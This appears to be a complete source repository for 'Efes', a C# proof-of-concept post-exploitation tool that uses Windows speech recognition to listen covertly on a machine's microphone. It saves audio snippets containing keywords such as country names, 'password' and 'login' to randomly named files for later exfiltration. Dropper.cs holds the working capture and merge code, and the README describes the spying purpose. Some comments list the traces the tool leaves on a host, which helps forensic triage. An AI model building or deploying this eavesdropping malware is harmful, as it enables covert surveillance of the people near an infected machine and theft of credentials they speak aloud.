├── .gitattributes
├── .gitignore
├── Efes.sln
├── Efes
├── App.config
├── Dropper.cs
├── Efes.csproj
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
└── keywords.dat
└── README.md
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is needed for earlier builds of msysgit that do not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 |
4 | # User-specific files
5 | *.suo
6 | *.user
7 | *.userosscache
8 | *.sln.docstates
9 |
10 | # User-specific files (MonoDevelop/Xamarin Studio)
11 | *.userprefs
12 |
13 | # Build results
14 | [Dd]ebug/
15 | [Dd]ebugPublic/
16 | [Rr]elease/
17 | [Rr]eleases/
18 | x64/
19 | x86/
20 | bld/
21 | [Bb]in/
22 | [Oo]bj/
23 | [Ll]og/
24 |
25 | # Visual Studio 2015 cache/options directory
26 | .vs/
27 | # Uncomment if you have tasks that create the project's static files in wwwroot
28 | #wwwroot/
29 |
30 | # MSTest test Results
31 | [Tt]est[Rr]esult*/
32 | [Bb]uild[Ll]og.*
33 |
34 | # NUNIT
35 | *.VisualState.xml
36 | TestResult.xml
37 |
38 | # Build Results of an ATL Project
39 | [Dd]ebugPS/
40 | [Rr]eleasePS/
41 | dlldata.c
42 |
43 | # DNX
44 | project.lock.json
45 | project.fragment.lock.json
46 | artifacts/
47 |
48 | *_i.c
49 | *_p.c
50 | *_i.h
51 | *.ilk
52 | *.meta
53 | *.obj
54 | *.pch
55 | *.pdb
56 | *.pgc
57 | *.pgd
58 | *.rsp
59 | *.sbr
60 | *.tlb
61 | *.tli
62 | *.tlh
63 | *.tmp
64 | *.tmp_proj
65 | *.log
66 | *.vspscc
67 | *.vssscc
68 | .builds
69 | *.pidb
70 | *.svclog
71 | *.scc
72 |
73 | # Chutzpah Test files
74 | _Chutzpah*
75 |
76 | # Visual C++ cache files
77 | ipch/
78 | *.aps
79 | *.ncb
80 | *.opendb
81 | *.opensdf
82 | *.sdf
83 | *.cachefile
84 | *.VC.db
85 | *.VC.VC.opendb
86 |
87 | # Visual Studio profiler
88 | *.psess
89 | *.vsp
90 | *.vspx
91 | *.sap
92 |
93 | # TFS 2012 Local Workspace
94 | $tf/
95 |
96 | # Guidance Automation Toolkit
97 | *.gpState
98 |
99 | # ReSharper is a .NET coding add-in
100 | _ReSharper*/
101 | *.[Rr]e[Ss]harper
102 | *.DotSettings.user
103 |
104 | # JustCode is a .NET coding add-in
105 | .JustCode
106 |
107 | # TeamCity is a build add-in
108 | _TeamCity*
109 |
110 | # DotCover is a Code Coverage Tool
111 | *.dotCover
112 |
113 | # NCrunch
114 | _NCrunch_*
115 | .*crunch*.local.xml
116 | nCrunchTemp_*
117 |
118 | # MightyMoose
119 | *.mm.*
120 | AutoTest.Net/
121 |
122 | # Web workbench (sass)
123 | .sass-cache/
124 |
125 | # Installshield output folder
126 | [Ee]xpress/
127 |
128 | # DocProject is a documentation generator add-in
129 | DocProject/buildhelp/
130 | DocProject/Help/*.HxT
131 | DocProject/Help/*.HxC
132 | DocProject/Help/*.hhc
133 | DocProject/Help/*.hhk
134 | DocProject/Help/*.hhp
135 | DocProject/Help/Html2
136 | DocProject/Help/html
137 |
138 | # Click-Once directory
139 | publish/
140 |
141 | # Publish Web Output
142 | *.[Pp]ublish.xml
143 | *.azurePubxml
144 | # TODO: Comment the next line if you want to checkin your web deploy settings
145 | # but database connection strings (with potential passwords) will be unencrypted
146 | #*.pubxml
147 | *.publishproj
148 |
149 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
150 | # checkin your Azure Web App publish settings, but sensitive information contained
151 | # in these scripts will be unencrypted
152 | PublishScripts/
153 |
154 | # NuGet Packages
155 | *.nupkg
156 | # The packages folder can be ignored because of Package Restore
157 | **/packages/*
158 | # except build/, which is used as an MSBuild target.
159 | !**/packages/build/
160 | # Uncomment if necessary however generally it will be regenerated when needed
161 | #!**/packages/repositories.config
162 | # NuGet v3's project.json files produce more ignorable files
163 | *.nuget.props
164 | *.nuget.targets
165 |
166 | # Microsoft Azure Build Output
167 | csx/
168 | *.build.csdef
169 |
170 | # Microsoft Azure Emulator
171 | ecf/
172 | rcf/
173 |
174 | # Windows Store app package directories and files
175 | AppPackages/
176 | BundleArtifacts/
177 | Package.StoreAssociation.xml
178 | _pkginfo.txt
179 |
180 | # Visual Studio cache files
181 | # files ending in .cache can be ignored
182 | *.[Cc]ache
183 | # but keep track of directories ending in .cache
184 | !*.[Cc]ache/
185 |
186 | # Others
187 | ClientBin/
188 | ~$*
189 | *~
190 | *.dbmdl
191 | *.dbproj.schemaview
192 | *.jfm
193 | *.pfx
194 | *.publishsettings
195 | node_modules/
196 | orleans.codegen.cs
197 |
198 | # Since there are multiple workflows, uncomment next line to ignore bower_components
199 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
200 | #bower_components/
201 |
202 | # RIA/Silverlight projects
203 | Generated_Code/
204 |
205 | # Backup & report files from converting an old project file
206 | # to a newer Visual Studio version. Backup files are not needed,
207 | # because we have git ;-)
208 | _UpgradeReport_Files/
209 | Backup*/
210 | UpgradeLog*.XML
211 | UpgradeLog*.htm
212 |
213 | # SQL Server files
214 | *.mdf
215 | *.ldf
216 |
217 | # Business Intelligence projects
218 | *.rdl.data
219 | *.bim.layout
220 | *.bim_*.settings
221 |
222 | # Microsoft Fakes
223 | FakesAssemblies/
224 |
225 | # GhostDoc plugin setting file
226 | *.GhostDoc.xml
227 |
228 | # Node.js Tools for Visual Studio
229 | .ntvs_analysis.dat
230 |
231 | # Visual Studio 6 build log
232 | *.plg
233 |
234 | # Visual Studio 6 workspace options file
235 | *.opt
236 |
237 | # Visual Studio LightSwitch build output
238 | **/*.HTMLClient/GeneratedArtifacts
239 | **/*.DesktopClient/GeneratedArtifacts
240 | **/*.DesktopClient/ModelManifest.xml
241 | **/*.Server/GeneratedArtifacts
242 | **/*.Server/ModelManifest.xml
243 | _Pvt_Extensions
244 |
245 | # Paket dependency manager
246 | .paket/paket.exe
247 | paket-files/
248 |
249 | # FAKE - F# Make
250 | .fake/
251 |
252 | # JetBrains Rider
253 | .idea/
254 | *.sln.iml
255 |
256 | # CodeRush
257 | .cr/
258 |
259 | # Python Tools for Visual Studio (PTVS)
260 | __pycache__/
261 | *.pyc
--------------------------------------------------------------------------------
/Efes.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.26430.6
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Efes", "Efes\Efes.csproj", "{69199E2C-9637-40C1-985B-AF995EFB659D}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {69199E2C-9637-40C1-985B-AF995EFB659D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {69199E2C-9637-40C1-985B-AF995EFB659D}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {69199E2C-9637-40C1-985B-AF995EFB659D}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {69199E2C-9637-40C1-985B-AF995EFB659D}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | EndGlobal
23 |
--------------------------------------------------------------------------------
/Efes/App.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Efes/Dropper.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Speech.Recognition;
6 | using System.Globalization;
7 | using System.Reflection;
8 |
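namespace Efes
{
    /// <summary>
    /// Listens on the default audio input through System.Speech and, for every phrase that
    /// matches the embedded keyword grammar, writes the recognised audio to a file in
    /// <see cref="StorageDirectory"/>.
    /// </summary>
    /// <remarks>
    /// Host artifacts that follow directly from this code and are useful when triaging a machine:
    /// a process that loads System.Speech and opens the default audio device; a directory named
    /// with a GUID under the user's temp path (when no existing directory is supplied); files with
    /// random names and an <c>.efd</c> extension that hold WAV data; and randomly named
    /// <c>.wav</c> files produced when the snippets are merged.
    /// </remarks>
    class Dropper
    {
        /// <summary>Directory that receives the per-recognition <c>.efd</c> files and the merged <c>.wav</c>.</summary>
        public string StorageDirectory { get; set; }

        private SpeechRecognitionEngine recognizer;

        /// <summary>
        /// Builds the keyword grammar and binds the recogniser to the default audio device.
        /// Recognition does not start until <see cref="StartListening"/> is called.
        /// </summary>
        /// <param name="fname">Not read by this constructor; keywords always come from the embedded resource.</param>
        /// <param name="culture">Culture passed to the speech recognition engine.</param>
        /// <param name="storageDirectory">
        /// Output directory. When null, or when the directory does not already exist, a new
        /// GUID-named directory under the temp path is used instead.
        /// </param>
        public Dropper(string fname, CultureInfo culture, string storageDirectory = null)
        {
            // Keywords are loaded from the assembly's embedded "Efes.keywords.dat".
            var kw = ReadKeywords();

            // A missing or non-existent directory is silently replaced by a random temp directory.
            if (storageDirectory == null || !Directory.Exists(storageDirectory))
                storageDirectory = Path.Combine(Path.GetTempPath(), Guid.NewGuid().ToString());
            StorageDirectory = storageDirectory;
            Directory.CreateDirectory(StorageDirectory);

#if DEBUG
            Console.WriteLine(StorageDirectory);
#endif

            // Grammar shape: <anything> <one keyword> <anything>, so a keyword matches mid-sentence.
            var choices = new Choices(kw.ToArray());
            var gb = new GrammarBuilder();
            gb.AppendWildcard();
            gb.Append(choices);
            gb.AppendWildcard();
            var g = new Grammar(gb);

            recognizer = new SpeechRecognitionEngine(culture);
            recognizer.LoadGrammar(g);
            recognizer.SpeechRecognized += Recognizer_SpeechRecognized;
            recognizer.SetInputToDefaultAudioDevice();
        }

        /// <summary>
        /// Enable speech recognition and logging
        /// </summary>
        public void StartListening()
        {
            // Multiple: keep recognising after each match until RecognizeAsyncStop is called.
            recognizer.RecognizeAsync(RecognizeMode.Multiple);
        }

        /// <summary>
        /// Disable speech recognition and logging
        /// </summary>
        public void StopListening()
        {
            recognizer.RecognizeAsyncStop();
        }

        /// <summary>
        /// Collects files into one wav file
        /// </summary>
        /// <returns>The path to the single wav file</returns>
        /// <exception cref="InvalidOperationException">
        /// No <c>.wav</c> file is left after merging, for example when nothing was captured or
        /// only a single <c>.efd</c> file exists (a lone file is returned unmerged).
        /// </exception>
        public string Collectfiles()
        {
            var files = CollapseWaves(new DirectoryInfo(StorageDirectory));
            return files.First(x => x.Extension.ToLower() == ".wav").FullName;
        }

        /// <summary>
        /// Writes the audio of one recognised phrase to a new randomly named <c>.efd</c> file.
        /// </summary>
        private void Recognizer_SpeechRecognized(object sender, SpeechRecognizedEventArgs e)
        {
#if DEBUG
            Console.WriteLine(e.Result.Text);
#endif
            string target = Path.Combine(StorageDirectory, Path.GetRandomFileName()) + ".efd";
            using (Stream file = File.Create(target))
            {
                // The using block closes the stream; no explicit Close() is needed.
                e.Result.Audio.WriteToWaveStream(file);
            }
        }

        /// <summary>
        /// Reads the keywords to listen for out of an embedded dat file
        /// </summary>
        /// <returns>Every non-blank line of the resource that does not start with '#'.</returns>
        private IEnumerable<string> ReadKeywords()
        {
            var assembly = Assembly.GetExecutingAssembly();
            var resourceName = "Efes.keywords.dat";
            var keywords = new List<string>();
            // NOTE(review): GetManifestResourceStream returns null when the resource is absent,
            // in which case the StreamReader constructor throws.
            using (Stream stream = assembly.GetManifestResourceStream(resourceName))
            using (StreamReader reader = new StreamReader(stream))
            {
                string line;
                while ((line = reader.ReadLine()) != null)
                {
                    if (!line.StartsWith("#") && !String.IsNullOrWhiteSpace(line)) //ignore commented lines
                        keywords.Add(line);
                }
            }
            return keywords;
        }

        /// <summary>
        /// Recursively merge all files in a directory with a WAV header
        /// </summary>
        /// <param name="dir">Merging directory</param>
        /// <returns>
        /// The <c>.wav</c>/<c>.efd</c> files left in the directory once at most one remains.
        /// </returns>
        private IEnumerable<FileInfo> CollapseWaves(DirectoryInfo dir)
        {
            const short CHANNELS = 1;
            const int SAMPLE_RATE = 16000;
            const short BITS_PER_SAMPLE = 16;
            const int HEADER_SIZE = 44; //size of a wav header
            //these are all case-sensitive / length-sensitive
            const string RIFF = "RIFF";
            const string WAVEfmt = "WAVEfmt ";
            const string DATA = "data";

            // Snapshot the candidates once; the merged file created below is not part of it.
            var files = dir.GetFiles()
                .Where(f => f.Extension.ToLower() == ".wav" || f.Extension.ToLower() == ".efd")
                .ToList();

            if (files.Count <= 1)
                return files;

            string firstPath = files[0].FullName;
            string secondPath = files[1].FullName;

            int length;
            byte[] arrFirst;
            byte[] arrSecond;
            using (var first = new FileStream(firstPath, FileMode.Open, FileAccess.Read))
            using (var second = new FileStream(secondPath, FileMode.Open, FileAccess.Read))
            {
                //each file has a header, so add the total bytes and then subtract the header size for each
                length = (int)(first.Length + second.Length - (2 * HEADER_SIZE));

                // NOTE(review): HEADER_SIZE is used as the offset into the buffer, not as a file
                // position. Each buffer therefore starts with HEADER_SIZE zero bytes followed by
                // the input read from its beginning, so the input's own RIFF header ends up inside
                // the merged output and the sizes declared in the new header do not cover it.
                // Kept as in the original; relevant when parsing these files forensically.
                arrFirst = new byte[first.Length];
                first.Read(arrFirst, HEADER_SIZE, arrFirst.Length - HEADER_SIZE);
                arrSecond = new byte[second.Length];
                second.Read(arrSecond, HEADER_SIZE, arrSecond.Length - HEADER_SIZE);
            }

            string mergedPath = Path.Combine(dir.FullName, Path.GetRandomFileName()) + ".wav";
            using (var merged = new FileStream(mergedPath, FileMode.Create, FileAccess.Write))
            using (var bw = new BinaryWriter(merged))
            {
                bw.Write(RIFF.ToCharArray());
                bw.Write(length + HEADER_SIZE);

                bw.Write(WAVEfmt.ToCharArray());
                //chunk information and audio format info
                bw.Write((int)16);                                                  // fmt chunk size
                bw.Write((short)1);                                                 // audio format field
                bw.Write(CHANNELS);
                bw.Write(SAMPLE_RATE);
                bw.Write((int)(SAMPLE_RATE * ((BITS_PER_SAMPLE * CHANNELS) / 8)));  // bytes per second
                bw.Write((short)((BITS_PER_SAMPLE * CHANNELS) / 8));                // bytes per sample frame
                bw.Write(BITS_PER_SAMPLE);
                bw.Write(DATA.ToCharArray());
                bw.Write(length);

                bw.Write(arrFirst);
                bw.Write(arrSecond);
            }

            //delete merged files
            File.Delete(firstPath);
            File.Delete(secondPath);

            // One pair is merged per call; recurse until a single file is left.
            return CollapseWaves(dir);
        }
    }
}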
176 |
--------------------------------------------------------------------------------
/Efes/Efes.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {69199E2C-9637-40C1-985B-AF995EFB659D}
8 | Exe
9 | Efes
10 | Efes
11 | v4.5.2
12 | 512
13 | true
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
--------------------------------------------------------------------------------
/Efes/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 |
namespace Efes
{
    /// <summary>
    /// Console host for <c>Dropper</c>: starts keyword-triggered capture, waits for a key press,
    /// merges the captured snippets, prints the merged file's path and waits for another key press.
    /// </summary>
    class Program
    {
        /// <summary>Program entry point; <paramref name="args"/> is not used.</summary>
        static void Main(string[] args)
        {
            // The recogniser is created for US English. The "keywords.dat" argument is passed
            // through as the constructor's first parameter.
            var culture = new System.Globalization.CultureInfo("en-US");
            var listener = new Dropper("keywords.dat", culture);

            // Capture runs in the background until the first key press.
            listener.StartListening();
            Console.ReadKey();

            // Merge whatever was captured and show where the result was written.
            string mergedPath = listener.Collectfiles();
            Console.WriteLine(mergedPath);
            Console.ReadKey();
        }
    }
}
21 |
--------------------------------------------------------------------------------
/Efes/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// Assembly identity. The title and product name are the values shown in the compiled
// file's properties; the remaining descriptive fields are left empty.
[assembly: AssemblyTitle("Efes")]
[assembly: AssemblyProduct("Efes")]
[assembly: AssemblyCopyright("Copyright © 2017")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Types in this assembly are hidden from COM unless a type sets ComVisible(true) itself.
[assembly: ComVisible(false)]

// Typelib ID used if the project is ever exposed to COM.
[assembly: Guid("69199e2c-9637-40c1-985b-af995efb659d")]

// Version numbers are Major.Minor.Build.Revision. Build and Revision can be defaulted
// with '*', for example:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Efes/keywords.dat:
--------------------------------------------------------------------------------
1 | #Countries
2 | Afghanistan
3 | Bahrain
4 | Czechia
5 | Djibouti
6 | Egypt
7 | France
8 | Gabon
9 | Hong Kong
10 | Jordan
11 | Kazakhstan
12 | Liberia
13 | Mozambique
14 | North Korea
15 | Pakistan
16 | Qatar
17 | Russia
18 | Syria
19 | Tajikistan
20 | United Arab Emirates
21 | Venezuela
22 | Zambia
23 | #random
24 | password
25 | login
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Efes
2 | A simple proof-of-concept tool that uses the built-in speech recognition to listen for certain spoken keywords and then saves the matching audio to a file. This post-exploitation tool could be used to passively listen for high-value data and save it to a file to be exfiltrated at a later date. Because it records only small snippets, the file size should be small and, ideally, only the interesting snippets would be recorded.
3 |
--------------------------------------------------------------------------------